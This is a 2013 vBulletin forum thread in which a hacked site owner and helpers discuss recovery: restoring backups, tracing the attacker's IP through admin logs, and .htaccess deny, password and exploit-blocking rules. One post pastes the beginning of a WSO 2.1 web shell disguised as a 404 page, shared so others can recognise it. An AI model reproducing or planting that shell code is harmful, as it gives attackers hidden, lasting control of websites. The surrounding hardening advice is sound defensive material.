Hacked AGAIN- this time by W3 idiots! Help!

**Allthumbz** · Tue 17 Sep '13, 2:20pm

Originally posted by donald1234

If all your files were deleted from the server and they were, I saw the index file earlier, indeed it looks like your whole forum inc database was gone you or your host will need to do a complete restore from an earlier back up, thats why it will be taking so long. What type of hosting do you have, do you have a cpanel?

All files in the public_html directory were deleted. The database remained (it is stored elsewhere) and it was backed up.
Knownhost has taken over 7 hrs to restore. The other day it only took one hour. I asked and someone finally told me that "restores are not working on our system". I think their system was hacked and they are not admitting it.

I have VPS hosting with cpanel and WM. I pay $65 per month for it. Their service has been excellent up to this round of hacking. Now- they suck. It looks like I will have to get a new host. They keep blaming it on VBulletin, saying it is a software problem and a password problem. But I changed all passwords and did everything software-wise that I was told to. I don't see how all files were deleted without knowing my FTP password or hacking the server. The FTP password was changed (as was the others). That leaves only one possibility.

We've been down ALL DAY with this. And I need to get on once it comes up from restore and delete the INSTALL directory and check any other issues before they get me again.

I am so tired.

**Allthumbz** · Tue 17 Sep '13, 2:47pm

Was just told by Knownhost- they CANNOT restore me to the 16th due to hacks (this is after 7 hours of waiting). Best they can do is the 13th. At this point, I am beside myself and don't know what to do. Does this sound possible that they cannot restore "due to hacks"?

**Wayne Luke** · Tue 17 Sep '13, 2:54pm

The backups on the 16th could have been compromised as well. That is probably what they mean. I currently have a VPS with them and they are fairly good at providing the support they can.
There are four steps to securing your site. If you don't do them all or you do them in the wrong order than you're still susceptible to being attacked again.

Close the hole... This has three subparts in this instance.

Delete your install folder
Review your admin users and delete any that don't belong. Don't ban them. Don't make them regular users. Delete them.
Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions.

Fill the Hole... There are seven subparts in this instance.

Review your files for changes. You can do this under Maintenance -> Diagnostics.
Delete any Suspect Files.
Replace any files marked as "Does not contain expected contents"
Scan your plugins for malicious code (exec, base64, system, pass_thru, iframe are all suspect keywords). Delete any you find.
Repair any templates. Any templates that you don't have notes on changing, you need to revert. If you're using a custom style, it is best to delete your existing style and reimport from a fresh download.
Update your Addon Products.
Rebuild your datastores. You can use tools.php in the "do not upload" folder to do this. Upload it to your admincp directory, delete when done.

Secure the Hole
Parts of this were done by closing the hole but there are still things to do here.

Keep notes of all changes you make to the system - what templates and phrases you change, what files belong to which addons, what plugins do the addons install.
Consider using a separate Super Admin who has access to admin logs in the AdminCP. There should be only one Super Admin.
Create a lower permission Administrator for every day use.
Review your permissions in the system.
Block off access to the includes, modcp, packages and vb folders via .htaccess. Deny All can work here, unless you use the ModCP. You need user authorization there.
Move your attachments outside the forum root directory.
Create a complete backup of your site. Make database backups weekly.

Vigilance
You need to keep active on the security of the site.

Give out the fewest permissions necessary for anyone to do their job
Make sure your hosting provider updates the software.
Update to the latest vBulletin when it is released.
Make sure your addons are always up to date.

**donald1234** · Tue 17 Sep '13, 3:45pm

You should have a good look at your server logs to see who got in and how so that you can tighten your security in that particular area.

**Allthumbz** · Tue 17 Sep '13, 4:52pm

So I checked my "adminlog" in my SQL database for admin activity and determined, on the day this first started (9-12-13), the indian hacker (Rishdal Rider) imported a new plugin.php file to my server.

That adminlog in your database gives a lot of info. It tells WHAT they did, WHERE and what IP they used!

Edit	Copy	Delete	282251	26675	1379042443	plugin.php	files	113.193.161.110
Edit	Copy	Delete	282252	26675	1379042458	plugin.php	doimport	113.193.161.110
Edit	Copy	Delete	282253	26675	1379042459	plugin.php		113.193.161.110

be sure to replace this file with the one from VBulletin if you are having trouble. The IP address is from:

113.193.161.110

1908515182

113.193.161.110

Tikona Digital Networks Pvt. Ltd.

Tikona Digital Networks Pvt

None detected

Broadband

Static IP

Geolocation Information

India

Gujarat

Ahmedabad

23.0333 (23° 1′ 59.88″ N)

72.6167 (72° 37′ 0.12″ E)

**Allthumbz** · Tue 17 Sep '13, 7:37pm

Originally posted by Wayne Luke

The backups on the 16th could have been compromised as well. That is probably what they mean. I currently have a VPS with them and they are fairly good at providing the support they can.
There are four steps to securing your site. If you don't do them all or you do them in the wrong order than you're still susceptible to being attacked again.

Close the hole... This has three subparts in this instance.

Delete your install folder
Review your admin users and delete any that don't belong. Don't ban them. Don't make them regular users. Delete them.
Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions.

Fill the Hole... There are seven subparts in this instance.

Review your files for changes. You can do this under Maintenance -> Diagnostics.
Delete any Suspect Files.
Replace any files marked as "Does not contain expected contents"
Scan your plugins for malicious code (exec, base64, system, pass_thru, iframe are all suspect keywords). Delete any you find.
Repair any templates. Any templates that you don't have notes on changing, you need to revert. If you're using a custom style, it is best to delete your existing style and reimport from a fresh download.
Update your Addon Products.
Rebuild your datastores. You can use tools.php in the "do not upload" folder to do this. Upload it to your admincp directory, delete when done.

Secure the Hole
Parts of this were done by closing the hole but there are still things to do here.

Keep notes of all changes you make to the system - what templates and phrases you change, what files belong to which addons, what plugins do the addons install.
Consider using a separate Super Admin who has access to admin logs in the AdminCP. There should be only one Super Admin.
Create a lower permission Administrator for every day use.
Review your permissions in the system.
Block off access to the includes, modcp, packages and vb folders via .htaccess. Deny All can work here, unless you use the ModCP. You need user authorization there.
Move your attachments outside the forum root directory.
Create a complete backup of your site. Make database backups weekly.

Vigilance
You need to keep active on the security of the site.

Give out the fewest permissions necessary for anyone to do their job
Make sure your hosting provider updates the software.
Update to the latest vBulletin when it is released.
Make sure your addons are always up to date.

Wayne,

These are awesome suggestions. I have one newbie question about these two steps:[*]Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions.[*]Block off access to the includes, modcp, packages and vb folders via .htaccess. Deny All can work here, unless you use the ModCP. You need user authorization there.

I see there is an .htaccess file in the public_html (main forum directory). can I edit that with notepad? Exactly what commands and where do I use to close off the admincp and directories?

Please forgive my ignorance here.

Thanks.

**DemOnstar** · Tue 17 Sep '13, 7:41pm

I am in the same position as you are. I know very little about .htaccess.. Yes it can be edited with notepad...but I don't really understand what to do with it.
As regards closing off adminCP, modCP and includes directories etc, in your hosts cPanel there should be an option to add passwords to directories. This is the way I did it...

**donald1234** · Wed 18 Sep '13, 1:10am

You need to place a .htaccess file inside each of the above directories with a deny all order, the admin and mod cp will need an exception either by ip address or password so that you can enter. Remember that all of the above is useless if the attacker can access your server so make sure that is secure.

**Allthumbz** · Wed 18 Sep '13, 4:22am

In hope of helping someone else, here is another file the hacker uses. It looks innocent- 404.PHP. The bastard (Zishan Rider) even has the nerve to even give himself CREDIT for it. If you see it, delete it immediately:

<?php
/* WSO 2.1 (Web Shell by Zishan Rider) */
$auth_pass = "78a1cdefcb87a7d3a9af3570416c2a93";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }

**Allthumbz** · Wed 18 Sep '13, 4:55am

Originally posted by donald1234

You need to place a .htaccess file inside each of the above directories with a deny all order, the admin and mod cp will need an exception either by ip address or password so that you can enter. Remember that all of the above is useless if the attacker can access your server so make sure that is secure.

Can you give me the contents of the file to use please and tell me WHERE to put it so I can? Thanks!

**donald1234** · Wed 18 Sep '13, 6:55am

Hi you put the .htaccess file inside the directories so for includes it would be where your config.php is, to deny all it's

#order deny,allow
deny from all

and to make an exception for your admincp it's

#order deny,allow
deny from all
# allow the admin
allow from xx.xx.xx.xx (ip)
# allow moderator:
allow from xx.xx.xx.xx (ip)

Then only the person with the ip on the .ht can access your admincp. You need a fixed ip to do this.

you can also use a password if you don't have a fixed ip but this is less secure as passwords can be hacked, I do not know the .htaccess contents for password protection as I have never used it, perhaps someone else has?

**Ion Saliu** · Wed 18 Sep '13, 7:13am

From:

http://www.htaccess-guide.com/password-protection/

“To begin, decide which directory you would like to password protect (note that all files and subdirectories within the directory will be password protected), then create a .htaccess file following the main instructions and guidance which includes the following text:

AuthName "Member's Area Name"
AuthUserFile /path/to/password/file/.htpasswd
AuthType Basic
require valid-user

The first line tells the Apache Web Server the secure directory is called 'Member's Area Name', this will be displayed when the pop-up login prompt appears. The second line specifies the location of the password file. The third line specifies the authentication type, in this example we are using 'Basic' because we are using basic HTTP authentication and finally the fourth line specifies that we require valid login credentials, this line can also be used to specify a specific username, e.g. 'require user username' would require the username 'username'. You would use this if you were password protecting an administration area, rather than setting up a public password protected directory.

AuthName "Member's Area Name"
AuthUserFile /path/to/password/file/.htpasswd
AuthType Basic
require valid-user”

.htaccess is actually a complicated matter, that’s why the vBulletin guys are so evasive about this Apache-only feature. There are many pundits who advise strongly against the usage of .htaccess. It does affect server performance and it is not as secure as people would expect. As I’ve said in several posts after this Psychosama hack, my website and forum have had plenty of .htaccess files in several directories. Still, my forum was hacked — but not the rest of my website!

Me thinks the problem is config.php in the /includes directory of the vB forum software. It must be made really secure — only the vBulletin Team can do that…

**Allthumbz** · Wed 18 Sep '13, 8:32am

I think Zishad nailed my .htaccess file. Can one of you fellow suffer/good Samaritans post here an ENTIRE .htaccess as it is SUPPOSED to be along with the right commands to ban these worms? Thanks!

**Ion Saliu** · Wed 18 Sep '13, 9:13am

Originally posted by Allthumbz

I think Zishad nailed my .htaccess file. Can one of you fellow suffer/good Samaritans post here an ENTIRE .htaccess as it is SUPPOSED to be along with the right commands to ban these worms? Thanks!

Axiomatic Colleague of Mine:

As per my previous post, .htaccess is actually a complicated matter. The file can be very long and complex, covering a lot of server commands and controls. I can show a real file, but incomplete (to hide sensitive data). The fragment will work on your server, be it a website or a forum.

Copy-and-paste the code below to Notepad or any text editor (the best choice is Notepad++, a great freebie). Save the text file EXACTLY as .htaccess (make sure there is no .txt at the end). Upload .htaccess to the root of your site or forum via FTP; transfer mode: only ASCII or text mode. It should work – it bans many IPs for my site.

## USER IP BANNING
<Limit GET POST>
order allow,deny
deny from 222.77.207.11
deny from 144.76.78.199
deny from 37.130.224.22
deny from 117.27.67.15
deny from 27.159.248.19
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>

An easier way is to go to your AdminCP, Options, User Banning. Copy and paste the IPs you want to ban.

---
Here is more .htaccess useful info, especially for the vBulletin Team to look at – block common exploit requests:

http://www.askapache.com/htaccess/htaccess.html#Password_Protect_single_file

“Common Exploits
Block common exploit requests with 403 Forbidden. These can help a lot, may break some plugins.

RewriteCond %{REQUEST_URI} !^/(wp-login.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC]
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ ///.*\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\?\=?(http|ftp|ssl|https):/.*\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\?\?.*\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\.(asp|ini|dll).*\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\.(htpasswd|htaccess|aahtpasswd).*\ HTTP/ [NC]
RewriteRule .* - [F,NS,L]”

The author gives examples for his WordPress site (wp).

**Wayne Luke** · Wed 18 Sep '13, 10:15am

Originally posted by Allthumbz

Wayne,

These are awesome suggestions. I have one newbie question about these two steps:[*]Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions.[*]Block off access to the includes, modcp, packages and vb folders via .htaccess. Deny All can work here, unless you use the ModCP. You need user authorization there.

I see there is an .htaccess file in the public_html (main forum directory). can I edit that with notepad? Exactly what commands and where do I use to close off the admincp and directories?

Please forgive my ignorance here.

Thanks.

Password Protect a Directory Using .htaccess

http://davidwalsh.name/password-protect-directory-using-htaccess

Protecting files on your website from unauthorized users can be very important. Even more important is the method by which you accomplish this task. You could use PHP to listen for login authorization information on each page, but that doesn't protect your images, documents, and other media, does it? That's why I've found the .htaccess method of protecting files and directories the most reliable. Oh, and it's easy too!

If you have cPanel, you can do this in cPanel.

404 Not Found

http://docs.cpanel.net/twiki/bin/view/AllDocumentation/CpanelDocs/PasswordProtectDirectories

If those don't help, you need to contact your hosting company. Each directory needs its own .htaccess file. They don't need to be long... 4 lines in most cases.

vBulletin 4 End of Life

Hacked AGAIN- this time by W3 idiots! Help!

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment